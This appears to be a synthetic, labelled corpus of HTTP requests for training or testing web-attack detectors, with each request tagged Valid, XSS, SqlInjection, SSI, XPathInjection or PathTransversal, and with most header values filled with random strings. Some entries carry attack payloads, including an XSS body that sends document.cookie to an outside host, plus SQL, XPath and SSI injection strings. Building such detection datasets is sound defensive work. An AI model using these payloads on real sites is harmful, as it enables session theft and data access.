Via: FTP/6.5 166.56.42.121, HTTP/6.0 www.hcmonpkG.htm:4, 8.7 191.101.155.247:47616
Transfer-Encoding: gzip
Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 27.26.79.206
X-Serial-Number: 296173
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18242
Start - Id: 8874
class: Valid
GET /cbTSf-Z/qI0ZE_4iC1cW4Grv/eBQrgq/eIo5JPA/sEOUlayt7nT/tmpIPdocumentb0/ehtbrhiIhele/ebyceistN/ldlroahleM/eBeo2iIetA0hhurr.cfm? HTTP/1.1
Host: 110.196.246.238:80
Connection: RlshhiIl
Accept: audio/basic
Accept-Charset: iso-8859-5;q=0.6, macintosh;q=0.4, macintosh;q=0.2
Accept-Encoding: compress, gzip;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 132.87.118.161
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="980"
Date: Sun, 14 Mar 10 18:17:56 UTC
ETag: W/"xpB9lcdUhtkgRzEnu83H"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Sun, 03 Oct 04 12:54:29 CET
If-Unmodified-Since: Sat, 22 Nov 08 06:03:35 CET
If-Match: "kk4vNS20zlhgHFmX8Y4"
If-None-Match: "FjFLAES@Vd693cux"
If-Range: "7_FGAChqEi2kYsdwzat"
Max-Forwards: 4731
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: Basic czVQZzV1czo2ZXJBc3Q=
Range: 85-
Referer: http://www.wr0ie.it/ssrQys/ddt7bW/casj.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: 0bemTlhn (d@w1eoFHl; nEum5m; ani5IMZj)
UA-CPU: Sparc
UA-Disp: 359,1522,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3568x0188
Via: HTTP/4.6 249.157.99.30, tzso1/3.3 78.86.47.77:25178, 2.1 www.hniH.jpeg
Transfer-Encoding: deflate
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 295 www.trrmnci.htm "lutuwiehtspuezbeode" 
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8874
Start - Id: 45184
class: PathTransversal
GET /./? HTTP/1.0
Host: www.HrEde0o.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 20 Aug 04 10:41:49 UTC
ETag: W/"Om2MM2xg9YxaUgf@.A"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Sat, 15 Jan 05 18:53:28 GMT
If-Unmodified-Since: Sat, 10 Sep 05 11:25:42 UTC
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: "P0UMFHi1nMB6-YMc6e1M"
If-Range: Thu, 11 Nov 04 24:00:11 GMT
Max-Forwards: 747
MIME-Version: 7.0
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: 551-3881,-846
Referer: http://www.ho2c.net/wsneg/lc7xsuto/pthfaO/auexot8R.cgi
TE: trailers,trailers
Trailer: Authorization
User-Agent: Inakane (37IOXI; eYJqp92Pwu; aqrURN@5-u; i07OzUwTT; nvHNGiCx)
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: 3.5 152.142.6.173, siqed6/4.1 169.175.109.189
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45184
Start - Id: 34091
class: Valid
POST /vsjUetre/emyLtlOiiSaten2wo/dlnaiedrezyivueIinSi/0olc0hTidg4ynie7hpa/VvUUBo.includePa/wl0IQRElTxmlFlP/R-WOlocationqSm9/u42Q/1brt7anvtopenuolt/iRj1EoUkAwjO.php3? HTTP/1.0
Content-Length: 240
Content-Language: ncpee
Content-Encoding: deflate
Content-Location: http://www.nrnei.st/2hdseEue/nhooeals.mdb
Content-MD5: cmxocHkxdDhvdGRpcW9zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 14:36:36 GMT
Last-Modified: Sun, 29 Jul 07 03:17:37 GMT
Host: www.asUtir.cz
Connection: bnrsre
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: aa-sa
Cache-Control: ohttsh='Vn'
Client-ip: 191.183.8.68
Cookie: aen=09;m0ve=98610815;oVs5XKlogJE_6G=28;.-64xjQt=he;ieraaae=94394035
Cookie2: $Version="88"
Date: Mon, 25 Dec 06 20:21:11 CET
ETag: W/"0.MnTHDCqKwO0QoK"
Expect: 100-continue
From: 2s3rpd@N8dboRb.biz
If-Modified-Since: Mon, 31 May 04 17:26:55 CET
If-Unmodified-Since: Sat, 12 Feb 05 23:05:58 GMT
If-Match: "bzIGeIYUj1ibwf1pBH"
If-None-Match: "8EObg29Jv7lpJjDek"
If-Range: *
Max-Forwards: 71
MIME-Version: 9.8
Pragma: taeh='y7u'
Proxy-Authorization: Basic bmxlbzpsZHN0YmVteA==
Authorization: NTLM b3NlaVRubm50eTZtamlhdHNsd2VyQXRGd2lhZXVzRWF1c3JjbWUycg==
Range: -1
Referer: /eithuyr/cydkl/stNeTf/EotiOt4s.jpg
TE: trailers,deflate;q=0.2
Trailer: Accept-Charset
User-Agent: arahtdr
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7731x678
Via: 0.9 15.77.49.239
Transfer-Encoding: compress
Upgrade: rl7oi/4.1, tfeG/2.3, Est/0.8, rs7t/5.9
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

ecnsfoko=92838905&sotOe2fl4lewpd=lb9&zNstdinqEt=hhJwOpzK.&td=wnS&luf6faAssAum= -j&zswaehnitseezei=6evht1io6$soLa;fotb&dolcxrggc=hnz&afeanSb1td6h=iyjS08PS4YM&glefe=4&rdhaogrbkdhg=nkhk&jaenrtbwan7=srf8srIepasswdtaopen]&iipijnDge2w=r7JmN

End - Id: 34091
Start - Id: 46906
class: XSS
POST /zlaueo/nwCQywPsh1v7kddJays/eaeen1/5GMcdsxs--/yidpositionEO.E-Xs/atdUlwaRlos/Frcphttpganqcstylep.html? HTTP/1.0
Content-Length: 382
Content-Language: eismsEr,eeicem,dqopHp
Content-Encoding: deflate
Content-Location: /r9T5s/bfem2/thtnirei/aoot.png
Content-MD5: bjB0aXdpZHlzMWhiNnVBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 17 Jan 09 07:59:21 CET
Host: www.cmIgh.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: i3r-Ihudo, g5atwaai-rcsgte;q=0.5, aDkan-Ttkol;q=0.9, eleee-snd
Cache-Control: min-fresh=2
Client-ip: 44.189.197.231
Cookie: glumbe=3764;ivateeJ=ros8iawe mh1s;nd=nartnautoexecsaaautoexeccsf;pounoe2h=cbc@eallhrysexec1t[ 
Cookie2: $Version="07"
Date: Thu, 09 Dec 04 01:59:57 CET
ETag: "t@UnAXUQXOo_-9kX"
Expect: rezd8=ae1nY;5le1igo=1iciVsnl
From: 2rcqsd@eottar.fr
If-Modified-Since: Tue, 23 Jan 07 04:24:31 CET
If-Unmodified-Since: Wed, 23 May 07 21:17:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Jun 04 02:51:53 CET
Max-Forwards: 5
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: http://www.sncnaaoo.org/rInhgsle/wn8fl/reo7t/tlpn/lpna.jpg
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: em.t_OjZ http://www.1nybs.st
UA-CPU: MIPS
UA-Disp: 628,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8473x700
Via: 3.4 www.asiZl.jpeg:817, 4.3 www.96Se0b.jpg
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

oucaaafwen1yt=poese3&REouXutse8el=h6-N5Iw&kwp-winntTG=<img  src    =    " mocha:[alert ('tnet9');] "  >&sncinsert61Lj@=496&lErhtohA0w=9rnmTo4r5eer+&@P-6R0a7is28=sce&oselectt9CqW=9idt&ehdolEORg=nor tftieowp'c4&itnHihm=wueeTinehcnea&oXaoyyTYvbn=944161&o1hxtbrcevo=R  yin&oa5naeeepsy0ehr=n2YqYSI_Um&tnode3gCDx=tzZd1IY&rc43haq=E4hmeta=t1tw t&Tt4.GpWN=syi

End - Id: 46906
Start - Id: 9207
class: Valid
GET /nohoudtcoiwajaeaihqh/Na/uGcCqTBuqsj/1@inputyQaWE/eC5Wt-d2NHc5FzZ.msf?-ftpinf=cs HTTP/1.0
Host: 233.159.196.71:4
Connection: 1aaN
Accept: */*
Accept-Charset: iso-8859-8-i, euc-kr;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 25.52.6.133
Cookie: wveterl=0364269;syax2tSsls12t=tH9i;n9iaiYn=opse;ae0p=eJfttoAs2;2AxlfrcpBe8=tpihL6te7g9ssa;e0af=348419
Cookie2: $Version="81"
Date: Wed, 01 Oct 08 20:05:16 CET
ETag: "19P4u6yLgvRxCQQ9"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Mon, 22 Sep 08 04:34:41 GMT
If-Unmodified-Since: Mon, 16 Mar 09 07:38:47 UTC
If-Match: *
If-None-Match: "WTbGoudOApSEPeucK"
If-Range: *
Max-Forwards: 14
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic Y2U2cWQ6aHNlMTBwOXI=
Authorization: Basic aXJvcmF0OnNpYXVpcg==
Range: 10-0
Referer: /aeea/7vwg/xhnrebe/arsyft/r0ei7tAu.ace
TE: gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 2.3; zt-se; rv:2.8.7) Gecko/54800120
UA-CPU: Sparc
UA-Disp: 5248,9403,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3033x117
Via: HTTP/8.1 166.51.255.68, 1.5 37.50.68.61
Transfer-Encoding: identity
Upgrade: Zlmr/1.7, rxteta/3.1, aetTt/7.9
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6194472934474
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9207
Start - Id: 35412
class: SqlInjection
GET /rpx8iMYrrerfutno5aIb/aru/BdImtmpqLiframeMq_Lus/fBKH@a/f5TeCz.php4?rmheRxastorn7no=iM3tSnJ0&ltksRmtia1=uc0i03%299r&tidaa=ehsEAriunden&slEuBNH.dV=tPOHvTmcaa&eNocheao2=diaeth44betweenb&ngToo=928897&pf0RH9zw=tiydn&Nrdcf=tiyoyu&idrEscrxlDan=%27+AND++USER_NAME%28%29%3D%27sns&jdvjnokfrgreR=5945&ymr=arpemtzm HTTP/1.0
Host: 196.134.251.126:5317
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250, utf-8, iso-8859-4;q=0.7, hz-gb-2312, iso-8859-9
Accept-Encoding: identity;q=0.6, deflate;q=0.7, compress;q=0.1
Accept-Language: g9ps-pnama, g-ralia, s-eon1Pr;q=0.6, ei0deeG-u;q=0.8
Cache-Control: no-cache
Client-ip: 67.105.71.5
Cookie: replaceCyMrcpbYJ=srta7ttduurten;meetNmS9dssb=nskp4qdq;RyPmhTMbNxI6=5013294757;hxtdloxyeaG=hD3eB6.
Cookie2: $Version="1"
Date: Sun, 07 May 06 09:38:51 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Sun, 16 May 04 23:23:23 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: "71sJhQ_j41GbmmWwkj"
Max-Forwards: 28
MIME-Version: 4.3
Pragma: et=Hiyii65
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Basic VWlmYnk6eG9XaQ==
Range: -236
Referer: http://www.ms1elR.ch/mOlemej/vphQ/eoaadO.jsp
TE: gzip;q=0.5
Trailer: Host
User-Agent: rhgNbofaho (3sjnWth7; t6HM3A57mE; acWEoZC; 0llPdNWiP; 5kT8pkKADg)
UA-CPU: 68000
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 3.6 251.229.10.24, 4.7 3.182.46.169
Transfer-Encoding: 9eni
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35412
Start - Id: 39375
class: SSI
GET /my8rboiZwJHTD7jxXtZ/1Z0qB7CriI0oBj/ut/sdWentinniumeradtmds/hNsuew2ZQi/oeu/qvuos/hlIZ/cC90n.1ISf/aPfiLzupJ/e8ptan1c.html?3eaea=ehj&usrpb2ijie=5&uoEepeqhEao=ythengoheeeng&TiVkncuoEk=abain&tmpgroup by9l@selectSrxterm=37259573&fx7dcl9MReE=ii%2B&uoYirota=%3C%21--%23email+fromhost%3D%22www.sdEsho.com%22+tohost%3D%22mailbox.tai.com%22+message%3D%22tw8gme+qneIR2l+wtt+maE1CR%22+fromaddress%3D%22bmyeuf.com%22+toaddress%3D%22cuqal.xl.com%22+subject%3D%22ud%22+sender%3D%22sr.com%22+replyto%3D%22lE6pslr.com%22+cc%3D%22da26%22+inreplyto%3D%22txtij+ufla+bne%22+id%3D%22Ihaarmail%22+--%3E&enedtst=mfstyleAodhe HTTP/1.0
Host: www.E9eld9.st
Connection: close
Accept: application/*, video/quicktime;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: *;q=0.8
Cache-Control: max-age=91502
Client-ip: 19.66.228.157
Cookie: xhonfh3lWa=owQGP2rYXL7o
Cookie2: $Version="99"
Date: Mon, 01 Jun 09 18:01:42 UTC
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Sun, 03 Feb 08 10:05:38 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:13:00 GMT
If-Match: *
If-None-Match: "uXL0HQhCfjcdBr8W.hI"
If-Range: *
Max-Forwards: 349
MIME-Version: 0.0
Pragma: At=lh
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: Digest nonce
Range: -7403,569103-
Referer: /oghlp/xCPtqoy/torjrjt/e5lmm/chdohdeI.asp
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 2.1; t0-s4; rv:1.2.0) Gecko/33709099
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3402x217
Via: srf/7.1 102.213.77.230, 8.4 www.cvnejn.shtml, auZPn/6.5 www.8erenawr.gif:163
Transfer-Encoding: baag
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 190 47.240.214.57 "eTmefeexEnteh0llLor" "Fri, 17 Feb 06 05:54:12 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 687226920
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39375
Start - Id: 21791
class: Valid
GET /tM/ai/9w8dQTziy.6kt.J-/yO4Gvq4qUzE/saOFs@s6umzB8I.gif?XChhttpYKkQNeG=hb-oo&aNNz2rUj9i=v&5oaeteaxxnt=iHieotesnlN&aiDnsbpn=25742701&ss=o5and%2F%3Dorueubeh&cni4an=pEiee&mg=57&ln6if8pn7Nieee=ay+ntr&aAla9=dmbte&documentHphpb3ba=awAEat&dyewolg1aiuZnt=nBfobject%27akRunioni+&7aelxhB=+hn9il9s%3Fel+p9&enho2esstSns=hsNyrjs HTTP/1.1
Host: 146.105.4.193
Connection: close
Accept: image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: watd4aj-ei, FaeoMdif-0s5, omqi-ehnzyne;q=0.0
Cache-Control: no-store
Client-ip: 108.137.224.81
Cookie: inbnsu=i oi
Cookie2: $Version="9"
Date: Wed, 05 Aug 09 14:48:51 GMT
ETag: "bAa0I74X17.9.CWX5-R"
Expect: namlElv=leiohmpn;th1aIoRt=aiAtat
From: qn7fi@stAorh.org
If-Modified-Since: Wed, 12 Jul 06 14:10:21 GMT
If-Unmodified-Since: Wed, 29 Mar 06 09:10:05 UTC
If-Match: *
If-None-Match: "PSh-dUlRtD1AA4G"
If-Range: *
Max-Forwards: 11
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: NTLM aWZFbmRzb2hyc2F2ZW5leDJkbGNvd21zbW5Jc2Vhd2YzYWlpeWl0dGU3
Range: -6711
Referer: /vwnta5/oscter.css
TE: deflate;q=0.9
Trailer: Cache-Control
User-Agent: hizbiyEptr/5.5.2.7.2
UA-CPU: StrongARM
UA-Disp: 097,8940,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9055x3634
Via: HTTP/6.0 www.hgrg.shtml:5933, FTP/9.9 www.gdbm.gif:89229
Transfer-Encoding: gzip
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 30429735593658505
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21791
Start - Id: 5788
class: Valid
PUT /njEN/uefHt_9ZFg4luiY/updateRnc.TfuuO.2hi/sX21fC/rspL.ygrn/jyRbQUP__dQ/n2eanOeenedtebkp/aAH/hnpdusEftid/gwLxrees6xeye/exYa.jpeg? HTTP/1.0
Content-Length: 140
Content-Language: f4g,ia,ri0e4hrf
Content-Encoding: identity
Content-Location: /o5onste/itoap/dlmn/math.png
Content-MD5: dG9ldG1sanVvdDZvZUVnaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Nov 04 05:23:27 UTC
Last-Modified: Thu, 06 Sep 07 13:07:30 GMT
Host: www.coeMyih.net:80
Connection: n0nsty
Accept: */*
Accept-Charset: x-mac-icelandic, ks_c_5601-1987
Accept-Encoding: *;q=0.1
Accept-Language: chuoa9-ts, Ietnaj-ar8dmd, men8-1Idabef;q=0.9
Cache-Control: no-store
Client-ip: 58.50.79.64
Cookie: jnryilbseheDso=n-;fnefHEiiA=db-oyteac8tlibwsa4a;vMEetpechoSgchild=v'+;DdAw0igo=d88A7ygA;lgk0=soo
Cookie2: $Version="647"
Date: Tue, 28 Jun 05 18:16:31 GMT
ETag: W/"PXHu5LI2joasUIhmc"
Expect: atoIErr
From: o0am9fre@olkaeabem.net
If-Modified-Since: Fri, 23 Feb 07 10:49:12 UTC
If-Unmodified-Since: Fri, 02 Dec 05 04:17:07 CET
If-Match: "WgDWvz7DXtsDXQvxoUEQ"
If-None-Match: *
If-Range: Fri, 12 Mar 10 16:03:45 UTC
Max-Forwards: 7296
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM dGFvcnRvc2xyaW9nNjNycnJldHBmY3RvdnJuenRzc2hURWxt
Authorization: OrOSl xvns=t8syteh
Range: 8721-,-634002
Referer: http://sLtvtt.gov/khdero/nu4Na.php4
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/9.3 (compatible; MSIE 1.1; Win 9x; stbeec)
UA-CPU: 68000
UA-Disp: 9613,3615,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 910x9129
Via: 6.6 www.1ryfb.css, 7.9 www.tanks.css
Transfer-Encoding: compress
Upgrade: oreemE/7.6, rnu/7.4
Warning: 669 175.253.249.242:78324 "slmoebrsy6Uetltw" 
X-Forwarded-For: 55.81.28.168
X-Serial-Number: 94351330899239471408
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TMwpOFYY98=930122517&e1o9hhhI6eeotrs=uxM=Cimg+aseIpnph-&ts0yiBm=sN&nlEwHtm4xm=yvincnhm0ej&nhkiClCwy=O4tesm1Wr8zdtlli&a88seeenetT=tB9.DPY

End - Id: 5788
Start - Id: 49731
class: XPathInjection
GET /EfEmti/Eaelm/qnsAstyleDVvlD/ns/nuash7sbrH/fYinputM_93dFKeR8FN/pe5mshrlU0e/sAVpkhI1slmzDww7sz/iehp3qstuy/r1fkp.php4?tphlcnn=%3AeglveXn0nodedxtermd%2BS&edi8eeo3ElIhiea=oH%27+or+++1%3C+++++nikn%2Fm%2Foc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D33%5D++++or+++%27tr%27+++%3D++++%27&6eitloi=s%27tniely%2BVs%26tlauu&0d=t1oekkwetTlubdc&deeaeesv=57792 HTTP/1.0
Host: 228.14.87.3
Connection: edssd
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.6
Accept-Language: *;q=0.7
Cache-Control: max-age=1
Client-ip: 24.134.122.55
Cookie: csee2hyes5oe1e=aipTSl;eerme=vVeB_Qlo;Gyformupdate6e4Q2.=tropenntae  %
Cookie2: $Version="05"
Date: Sun, 06 Apr 08 20:36:29 GMT
ETag: "JYMP4D0.htFnvfn"
Expect: YPyCnhd=7cncnni
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 01 Feb 09 13:25:53 GMT
If-Unmodified-Since: Wed, 10 Jun 09 11:31:13 UTC
If-Match: *
If-None-Match: "A5d0@9cR@oiQehAe"
If-Range: Wed, 07 Dec 05 24:13:13 CET
Max-Forwards: 7
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: http://dOEEwam.uk/many/nSnht.swf
TE: trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.9 (X11; U; Open BSD i386 8.4; hk-ws; rv:5.6.5) Gecko/81252980
UA-CPU: StrongARM
UA-Disp: 3498,894,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7900x666
Via: FTP/6.9 40.144.136.140, FTP/9.4 107.121.180.27
Transfer-Encoding: compress
Upgrade: Nxie/2.9, waree/1.4, eaTli/1.5
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49731
Start - Id: 46829
class: XSS
PUT /Ns8i9IhttIitnso/r_BxFhwBz8jmqAk/tdprottiiopipua76d6h/nooIsaoanzk/azEAmtkZQOIxsqiFeN/raSNDwrsonyes/lwo2myaa7e/svcwM.png? HTTP/1.1
Content-Length: 299
Content-Language: otofYa
Content-Encoding: compress
Content-Location: /th7ub7/E87hfs/6riot/rXLeaId.tiff
Content-MD5: b0E5ZXRnbmwxNnRhbmh0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Nov 07 15:31:41 CET
Last-Modified: Thu, 15 Apr 04 22:46:34 CET
Host: 72.77.173.88
Connection: etIreita
Accept: video/quicktime, audio/basic;q=0.3
Accept-Charset: shift_jis;q=0.4, hz-gb-2312;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Sun, 12 Mar 06 09:36:59 GMT
ETag: W/"2SNT9ZxNfeCLk-3"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Wed, 17 Oct 07 15:15:11 UTC
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Digest cnonce="rw8aho"
Range: 04-141477,-19
Referer: /al8l/ecaeiaEr/H5lcO1l/8nlw.jsp
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (compatible; zym4yrlo; Win98; y8sEob1ve; hbesexe; atecoi)
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 1.8 www.uD2z.jpg, 7.8 www.tog7ty.jpeg, FTP/3.6 159.200.13.179
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EeffeogncmEruo=ctncutenruc&eqareropre=TwE&hsrreilu9lmv3o=45&F3P37T=<xml     src  ="     javascript:    [document.location.replace('http://www.elgela.com/cgi-bin/na.cgi'+document.cookie);]" >&oeds=eeconnect t&eIe9tvmNokdhrI=an  &ancowti=<an&thWhrsysa7=27370498

End - Id: 46829
Start - Id: 32753
class: Valid
POST /5id4sV.CbUb/ptrn/o4ebn/6tgetg6mliO/eLrguflbtiyarSe/g7I1C0aItsFQgid2e4m/dOss9/eS9aspih/rUvDjMZl0sKU/yhaalmlnK/lateae7uZtaowgdii/rORoznm-7Hr.php3? HTTP/1.0
Content-Length: 195
Content-Language: t1jTr,a
Content-Encoding: compress
Content-Location: http://hn8Ec.uk/Tm7dh/haiua/ahln3tel/aaue1ivi/hioieq.sh
Content-MD5: cE9odGJhb2dvdHNtczMzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Aug 08 12:20:56 UTC
Last-Modified: Fri, 05 Jan 07 24:56:57 GMT
Host: www.sohsug.uk
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-936;q=0.4, big5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 33.225.104.136
Cookie: PIx4=3735;ttwcsdbe0mu=16
Cookie2: $Version="10"
Date: Sat, 17 Apr 04 17:23:14 GMT
ETag: "KQmvMjy@tItzccQF"
Expect: hohyieh=esse3f;uroe0=susxussd
From: ynuuOeYe@e4oe.com
If-Modified-Since: Mon, 02 Aug 04 20:49:54 CET
If-Unmodified-Since: Sun, 25 Sep 05 02:04:59 UTC
If-Match: "avOVQ4DI5Myk2_OKyDv"
If-None-Match: "@cmBxan39W6fgsMG6A"
If-Range: Tue, 15 Aug 06 22:22:17 GMT
Max-Forwards: 4
MIME-Version: 9.2
Pragma: bu=66nt
Proxy-Authorization: Digest response="7913fAA83fc9DcD5BDb8CfabA4Bb10C5"
Authorization: Digest cnonce="geIS"
Range: 7780-1621,55-
Referer: /i4obI5/teai/n4lc/jqcl.mpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.3 (compatible; MSIE 9.3; Mac OS X; hSRsgpo7)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1032x4856
Via: cvh5r9/2.8 143.30.110.219, 5.4 15.62.93.224:517, gsd/3.6 132.91.60.208
Transfer-Encoding: compress
Upgrade: ven/0.4
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 419486825126
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

